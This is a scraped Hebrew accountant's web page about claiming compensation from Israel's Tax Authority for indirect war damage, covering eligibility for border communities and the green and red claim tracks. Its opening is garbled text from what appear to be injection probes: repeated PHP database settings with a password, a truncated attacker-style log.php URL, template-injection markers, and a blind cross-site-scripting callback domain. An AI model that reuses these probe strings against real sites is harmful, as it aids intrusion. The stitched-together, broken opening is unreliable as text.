$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1iHl8CheO"; ?> $db_host = "1"; $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1<tMjBvl<"; ?>acker-9573/log.php?"; ?>{acx}}%>"; ?>"; ?>ass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>'hitylezkgfiwoe392a.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>  נגרם לך נזק עקיף? בדוק את זכאותך לפיצוי!


רואה חשבון ועוד!

הבית הפיננסי שלך

 רואה חשבון ועוד
חוות דעת מקצועית בענייני ראיית חשבון:
שם מלא
מספר טלפון
פנייה לרואה חשבון >>

הדרך לקבל פיצוי על נזק עקיף מתחילה כאן...


דרגו אותנו:
| דירוגך () בוצע בהצלחה
 () דירוגים | דירוג ממוצע ()
stars - based on reviews

Hebrew

מצבי לחימה, גם אם אינם מוגדרים כמלחמה של ממש, מסבים לעתים נזק לרכוש אזרחי ולהכנסות של אזרחים. מדובר בפגיעה הנחשבת לעקיפה, משום שלא מדובר בנזק שנוצר ישירות כתוצאה מהשתתפות בלחימה, אלא בנזקים כלכליים המהווים תוצר לוואי של הלחימה עצמה.

מדינת ישראל, באמצעות רשות המסים, מעניקה לאזרחים פיצוי בגין נזקי ממון שכאלה על פי חוק מס רכוש וקרן פיצויים.

הפיצוי ניתן על פגיעה ברכוש כגון: בית, מכונית, בית עסק וכן על אובדן הכנסות כתוצאה מהשבתה של פעילות עסקית עקב מצב הלחימה.

ואולם החוק למתן פיצוי עקיף אינו חל על כל אזרחי המדינה, כי אם רק על אלה המתגוררים במה שמכונה ישוב ספר. שר האוצר הוא המוסמך להכריז על יישובים מסוימים כישובי ספר, אשר תושביהם זכאים לפיצוי על נזקים עקיפים בעת מלחמה.

מי זכאי לפיצוי?

כאמור, המגורים בישוב ספר הכרחיים לצורך קבלת פיצוי, אך ישנם מקרים יוצאים מן הכלל.

כך לדוגמה, תושבי אשקלון ונתיבות, שספגו נפילת רקטות בדצמבר 2008 בזמן "עופרת יצוקה", לא היו באותה עת זכאים לפיצוי, משום שערים אלה לא נכללו ברשימת יישובי הספר בישראל.

לקריאה נוספת - הטבות מס ליישובים בפריפריה

אולם בעקבות האירועים הכריזה ועדת הכספים של הכנסת על ערים אלה ונוספות כאזור עם "מצב מיוחד", וקבעה כי תושביהן יהיו זכאים לפיצוי על נזקים שנגרמו להם. מכאן, שמדובר במצב דינמי שעשוי להשתנות לפי הנסיבות.

זכאים להגיש תביעה לפיצוי עקיף כל מי שמתגוררים או מנהלים עסק ביישוב ספר.

ניתן לדעת אם אזור המגורים או העבודה נכלל ברשימה באמצעות כניסה לאתר רשות המסים, המעדכן מידע זה.

אם מצב הלחימה הסב לכם נזק פיזי (הרס של מבנה), אובדן הכנסות (כתוצאה מאי-הגעת עובדים לעבודה או השבתה כפויה בשל ירי רקטות) או הוצאות שירדו לטמיון – אתם זכאים לתבוע פיצוי.

אופן הגשת הבקשה

התדיינות מול רשויות המדינה בנושאים כספיים עלולה להיות מייגעת ומסובכת, ורצוי להתייעץ עם איש מקצוע ולבצע את המהלך בליווי שלו.

זאת משום שישנו מידע רב וחיוני שיכול להכריע את סיכויי התביעה להתקבל: יש להגישה במועד, לדעת באיזה מסלול פיצוי לבחור, מה הקריטריונים לבקשת פיצויים, כיצד מחושב הפיצוי ועוד.

לרשות המסים מסלול תביעות ירוק ומסלול אדום, בהתאם לטיב הנזק. במסגרת המסלול הירוק זכאים בעלי עסקים ומסעדות לפיצוי בגין ירידה בהכנסות או הוצאות שנעשו בתקופת הלחימה.

המסלול האדום מאפשר הגשת תביעות שונות ואישיות שנבדקות לגופן ואינן צמודות לנוסחאות קבועות של רשות המסים.

ייתכן גם שאתם זכאים לפיצוי לפי סעיף מסוים ואינכם מודעים לכך. רואה חשבון הבקיא בתחום יוכל להבטיח שההליך ייעשה במהירות וביעילות מקסימאלית ושבסיומו יתקבל הפיצוי המרבי.

בעזרת רואה חשבון, ניתן לבדוק את הזכאות לפיצוי, להחליט איזה סוג בקשה להגיש ולמלא את הטפסים המתאימים באתר רשות המסים.

אף על פי שלמדינה יש נוסחאות קבועות לחישוב הפיצוי בכל מקרה ומקרה, הבנת התהליך והכרת הנושא יכולות להגדיל את גובה הפיצויים במידה ניכרת.

המשך לקרוא על: יצוג מול רשויות המס


תאריך: 29/01/2014 08:02
 
close